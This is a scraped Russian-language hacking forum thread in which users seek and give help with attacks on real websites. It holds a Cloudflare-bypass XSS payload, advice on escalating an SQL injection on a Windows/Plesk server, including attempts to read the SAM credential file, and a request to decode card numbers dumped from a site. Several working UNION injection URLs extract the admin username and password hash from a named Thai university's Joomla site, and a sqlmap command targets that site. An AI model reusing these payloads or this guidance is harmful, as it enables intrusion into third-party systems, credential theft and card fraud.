там очень рандомно бро, на одном из сайтов такой был
/admin/admin/index/index/key/d31cef05b2eb846ef0778a70fca4f8ce8a0163d2d8cb1654b16c396e5d42f748/
-
XSS.stack #1 – первый литературный журнал от юзеров форума
[web-hacking] Ваши вопросы
- Автор темы .Slip
- Дата начала
-
- Теги
- web-hacking
/admin/admin/index/index/key/d31cef05b2eb846ef0778a70fca4f8ce8a0163d2d8cb1654b16c396e5d42f748/
как нашел?
Код:
CLOUDFLARE BYPASS
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
Подскажите пожалуйста, в какую сторону двигаться... есть SQLi с возможностью load_file (sql-shell sqlmap). Вызвал в вебе ошибку и получилс Physical path: E:\inetpub\vhosts\site.com\index.asp. Получилось прочитать hosts, aspnet_schema.xml, но вот файл который выдала ошибка прочитать не удается. В чем может быть проблема? Понимаю, что скорее всего дело в правах... но с другой стороны, файлы из C:\Windows\System32 дает читать, а эти нет... boot.ini, win.ini тоже без проблем...
Как можно двигаться дальше? На сервере есть ftp, но как я понимаю в Windows нужные мне данные лежат в реестре и достать их не вариант. Попробовал чекнуть стандартные варианты Filezilla, пустота. Прочитать SAM тоже не получилось, пробовал разные варианты (C:/Windows/system32/config/regback/sam, C:/WINDOWS/Repair/SAM). Записать в файл через INTO OUTFILE, соответственно, не получится так как нет стэка запросов. Пытался накопать web.config, global.asa но нифига...
Где у сайта админка, пока не накопал. Есть там кой какие зацепки, но ничего существенного. Хэщи паролей от MySQL парсятся, но толку в кривых руках от этих хешей ноль... В базах кредсов нет, вернее есть, но там вообще ничего об админах. Вероятно, если и есть админка, то где-то отдельно админ все держит. Может в конфигах каких. Идей пока нет.
Как можно двигаться дальше? На сервере есть ftp, но как я понимаю в Windows нужные мне данные лежат в реестре и достать их не вариант. Попробовал чекнуть стандартные варианты Filezilla, пустота. Прочитать SAM тоже не получилось, пробовал разные варианты (C:/Windows/system32/config/regback/sam, C:/WINDOWS/Repair/SAM). Записать в файл через INTO OUTFILE, соответственно, не получится так как нет стэка запросов. Пытался накопать web.config, global.asa но нифига...
Где у сайта админка, пока не накопал. Есть там кой какие зацепки, но ничего существенного. Хэщи паролей от MySQL парсятся, но толку в кривых руках от этих хешей ноль... В базах кредсов нет, вернее есть, но там вообще ничего об админах. Вероятно, если и есть админка, то где-то отдельно админ все держит. Может в конфигах каких. Идей пока нет.
Последнее редактирование:
не понял, там же не нужен стакед.
Вот еще попробуй https://github.com/koparmalbaris/MySQL-UDF-Exploitation
А так же попробуй на Responder отправить запрос через load_file
Что крутиться на портах?
Кто юзер бд?
p.s. можешь скинуть в пм если что, я погляжу)
Спасибо за подсказки! Копаясь в PDF, вспомнил, что глобальных переменных больше чем просто @@version и вытащил для себя крайне интересные пути.
У меня сейчас нет возможности работать с таргетом, поэтому не все помню и смогу написать. Через пару дней дополню ответ. Возможно перекину таргет в ЛС, пока безумно хочется самому дожать. Ну знаете, чтобы не было чувства как с лабой какой-нибудь... ковыряешь, ковыряешь, психуешь не приложив достаточных умственных усилий и идешь по врайт-апу проходишь... потом понимаешь, что до смешного мелочи не хватило и становится крайне неприятно))))
Да, именно что SQLMAP ругался, что нет стакеда. Выглядит это подобным образом:
Что интересно, мапа нашла булеан, еррор, тайм и юнион, но стакед нет. Хотя мне думалось, что где юнион, стакед должен пролизать. Тем более в связке .NET+MySQL (если точнее, то MariaDB 10.6).
21/tcp open ftp (Microsoft ftpd)
53/tcp open domain (unknown banner: none)
80/tcp open http (Microsoft IIS httpd 10.0)
110/tcp open pop3 (MailEnable POP3 Server)
143/tcp open imap (MailEnable imapd)
443/tcp open https (Microsoft IIS httpd 10.0 Plesk Obsidian 18.0.51)
465/tcp open smtps
993/tcp open imaps (MailEnable imapd)
995/tcp open pop3s (MailEnable POP3 Server)
5357/tcp open wsdapi (Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP))
8443/tcp open https-alt (Microsoft IIS httpd 10.0 Plesk Obsidian 18.0.51)
22188/tcp open unknown (Microsoft Terminal Services)
Наружу не отстукивает.
Последнее, что удалось достать из приятного это "my.ini" из "\\Program Files (x86)\\Plesk\\Databases\\MySQL\\Data\\". В самом файле новой информации ноль, но это дает надежду)))
Что касается пользователя базы это admin@localhost.
Что мне показалось интересным, так это записи с доменами в файле hosts. Указан внешний IP-адрес, который находится через тот же Censys, а не какой-нибудь вариант localhost. Хотя я IIS никогда не настраивал, возможно это обычное дело. И здесь замешательства добавляет вот какой момент... когда анализирую таргет, делаю заметки. У меня в заметках по этой цели есть три IP и порта, полученных из запросов к колаборатору. Все три айпи гугло-серверов, порты совершенно рандомные (например, 46723). Но есть большая вероятность, что эти айпишки не по этому таргету. Просто случайно записал не в тот файл. Сижу и активно пытаюсь вспомнить. Если ошибки нет, то ранее внешние запросы проходили и приходили, почему-то с подсетей гугла. Сейчас же внешние запросы не проходят. Пробовал кучей вариантов, но нет...
74.125.43.146:35252
74.125.18.211:48632
74.125.40.155:43817
Но опять же, возможно напутал и это все не имеет вообще никакого значения.
Как только появится возможность, попробую udf exploitation. Если что не пойдет, в плане дальше искать потенциально интересные пути. Пока не удалось вытащить ini того же IIS или Plesk. Логи тоже не получается прочитать, в том числе не выходит найти логи установки Plesk. Для 49 релиза плеска есть эксплоит, но пока не получилось его прикрутить к 51-му. Сижу, пытаюсь понять, что же они пофиксили между релизами, может получится эксплоит адаптировать. Есть надежда, что получится найти что-то интересное в папках MailEnable.
P.S.
Уже даже подумываю, может арендовать какой-то минимальный VDS у хостера и посмотреть, как выглядит боль-мень стандартная структура сервера)))
Добрый день! Такой вопрос. Выгрузил небольшую базу с картишками с одного сайта. Но сами номера сс выглядят так 2e778f3a711e70d7755a1292e745dd7b5fba3e6dd75c5c37
Подскажите, пожалуйста, можно ли раскодировать.
Подскажите, пожалуйста, можно ли раскодировать.
В наше время СС в открытом виде не лежит в базах
Это хеш, если хеш есть, значит его можно расшифровать
Приветствую всех!кто-то может подсказать почему мап не может зацепиться ?
запрос вставляю из окуня. пейлоад удаляю , оставляю оригинальное значение и помечаю (*)
ваф нету
запрос вставляю из окуня. пейлоад удаляю , оставляю оригинальное значение и помечаю (*)
ваф нету
Код:
URL:
http://таргет/
Parameter:
/<s>/<s>/<s>/<s>/<n>/<s>/<s>/<s>/[*]/<s>/<n>
Attack Details
Path Fragment input /<s>/<s>/<s>/<s>/<n>/<s>/<s>/<s>/[*]/<s>/<n> was set to 2*if(now()=sysdate(),sleep(6),0)
Tests performed:
2*if(now()=sysdate(),sleep(15),0) => 19.999
2*if(now()=sysdate(),sleep(3),0) => 10.223
2*if(now()=sysdate(),sleep(15),0) => 19.999
2*if(now()=sysdate(),sleep(6),0) => 13.4
2*if(now()=sysdate(),sleep(0),0) => 0.901
2*if(now()=sysdate(),sleep(0),0) => 0.903
2*if(now()=sysdate(),sleep(6),0) => 12.935
Original value: 2
Vulnerability Description
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.
Discovered by SQL Injection
HTTP Request
GET /aec/index.php/component/hdflvplayer/112/title/%e0%b9%80%e0%b8%9e%e0%b8%a5%e0%b8%87---The-Asean-Way/id/2*if(now()=sysdate(),sleep(6),0)/page/1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://таргет/
Cookie: 0ccdf529fe19913fbfa0088a6449c7bb=b2690fab6a31a0ff3f9e63332bfbc3e8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: таргет
Connection: Keep-aliveну дак из команды удали таргет, и кинь сюда, почему у тебя не получается с sqlmap видя выхлоп с окуня - сложная задача
вот полный ответ с таргетом , глянь пожалста
URL:
Parameter:
/<s>/<s>/<s>/<s>/<n>/<s>/<s>/<s>/[*]/<s>/<n>
Attack Details
Path Fragment input /<s>/<s>/<s>/<s>/<n>/<s>/<s>/<s>/[*]/<s>/<n> was set to 2*if(now()=sysdate(),sleep(6),0)
Tests performed:
2*if(now()=sysdate(),sleep(15),0) => 19.999
2*if(now()=sysdate(),sleep(3),0) => 10.223
2*if(now()=sysdate(),sleep(15),0) => 19.999
2*if(now()=sysdate(),sleep(6),0) => 13.4
2*if(now()=sysdate(),sleep(0),0) => 0.901
2*if(now()=sysdate(),sleep(0),0) => 0.903
2*if(now()=sysdate(),sleep(6),0) => 12.935
Original value: 2
Vulnerability Description
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.
Discovered by SQL Injection
HTTP Request
GET /aec/index.php/component/hdflvplayer/112/title/%e0%b9%80%e0%b8%9e%e0%b8%a5%e0%b8%87---The-Asean-Way/id/2*if(now()=sysdate(),sleep(6),0)/page/1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://nan.mcu.ac.th/
Cookie: 0ccdf529fe19913fbfa0088a6449c7bb=b2690fab6a31a0ff3f9e63332bfbc3e8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: nan.mcu.ac.th
Connection: Keep-alive
Прекратите лохматить бабушку!
У вас должно быть более 10 реакций для просмотра скрытого контента.
htt_p://nan.mcu.ac.th/aec/index.php?option=com_hdflvplayer&Itemid=409&title=title_cus&compid=0&id=-296%0B/*!12345UnIOn*/%0B/*!12345SeleCt*/%0B1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22--&page=30
Это Joomla 2.5, получаем id админов:
htt_p://nan.mcu.ac.th/aec/index.php?option=com_hdflvplayer&Itemid=409&title=title_cus&compid=0&id=-296%0B/*!12345UnIOn*/%0B/*!12345SeleCt*/%0B1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(user_id),17,18,19,20,21,22%20from%20%23__user_usergroup_map%20where%20group_id=8%20or%20group_id=7--&page=30
дергаем админа:
htt_p://nan.mcu.ac.th/aec/index.php?option=com_hdflvplayer&Itemid=409&title=title_cus&compid=0&id=-296%0B/*!12345UnIOn*/%0B/*!12345SeleCt*/%0B1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,password),17,18,19,20,21,22%20from%20%23__users%20where%20id=703--&page=30
admin:$P$D6nM4vjUgoaLZuvCezowtCHKvBxGlP/ - хеш в phpass, в соседней теме могут помочь, хотя по словарям он и так норм брутится
одменка htt_p://nan.mcu.ac.th/aec/administrator/
Это Joomla 2.5, получаем id админов:
htt_p://nan.mcu.ac.th/aec/index.php?option=com_hdflvplayer&Itemid=409&title=title_cus&compid=0&id=-296%0B/*!12345UnIOn*/%0B/*!12345SeleCt*/%0B1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(user_id),17,18,19,20,21,22%20from%20%23__user_usergroup_map%20where%20group_id=8%20or%20group_id=7--&page=30
дергаем админа:
htt_p://nan.mcu.ac.th/aec/index.php?option=com_hdflvplayer&Itemid=409&title=title_cus&compid=0&id=-296%0B/*!12345UnIOn*/%0B/*!12345SeleCt*/%0B1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,password),17,18,19,20,21,22%20from%20%23__users%20where%20id=703--&page=30
admin:$P$D6nM4vjUgoaLZuvCezowtCHKvBxGlP/ - хеш в phpass, в соседней теме могут помочь, хотя по словарям он и так норм брутится
одменка htt_p://nan.mcu.ac.th/aec/administrator/
Совсем уже со своими мапами и окунями забыли как руками пользоваться, особенно при помощи головы)
Последнее редактирование:
Душнила мод On
Хеш - необратимое шифрование, его нельзя расшифровать, его можно только подобрать
Душнила мод Off
P.S. Похож на Tiger 192 bit, но это не точно
Последнее редактирование:
Т.е. когда я подберу его значение, я его расшифрую ?
Так попробуй:
sqlmap -u "http://nan.mcu.ac.th/aec/index.php/component/hdflvplayer/112/title/เพลง---The-Asean-Way/id/2" --data="id=2*" --level=5 --risk=3 --time-sec=6 --batch --banner
Если честно, я просил у тебя не выхлоп с окуня(он тут и так уже был), я просил у тебя твою команду, хотел увидеть твою ошибку и подсказать...
Таргеты лучше замазывай всегда, потому что как только ты его выложил, дальнейшая работа по нему считая бессмыслена!
Нет, ты его подберешь (это мы еще не учитываем возможные коллизии), а расшифровка это гарантированное превращение зашифрованных данных в исходные.
Да знаю знаю, обратимо и необратимо, в душнилу у меня не получается похоже
таргет тренировочный поэтому не жалко)
запрос был такой-же , только параметр указывал как get через -p
upd.. раскрутилась с нормальным запросом get методом
Последнее редактирование:
--random-agent ещё бы добавить, отвечал когда, спешил
<Супердушнила мод On>
Хэш не является шифрованием, так как шифрование предполагает дешифрование.
Криптографический хэш - необратимое преобразование, но пространство (хэш как вектор если рассматривать) криптографических хэшей всегда меньше пространства исходных данных, поэтому возможны так называемые "коллизии" когда два (или более) наборов данных дают один и тот же хэш.
Пространственный (spatial) хэш - не ставит себе цели необратимости и очень легко подбирается, используются такие хэши например для быстрого поиска например в базах данных.
Пример наверное самого простого "1D" хэша (для равномерного распределения чего либо): X = Y % N , где % это остаток от деления Y на N , и где N это число bucket'ов по которым надо (почти)равномерно раскидать (почти)равномерные данные какие-нибудь, потом при поиске (есть данные или нет в базе, например) легко узнать какой bucket смотреть и поиск перебором идёт только в нём, а не по всем данным, ну и больше bucket'ов с меньше данных в каждом - это значит быстрее поиск ;-)
</Супердушнила мод Off>
P.S. А всё же интересно как нашли тот URL (см. выше) типа:
Последнее редактирование: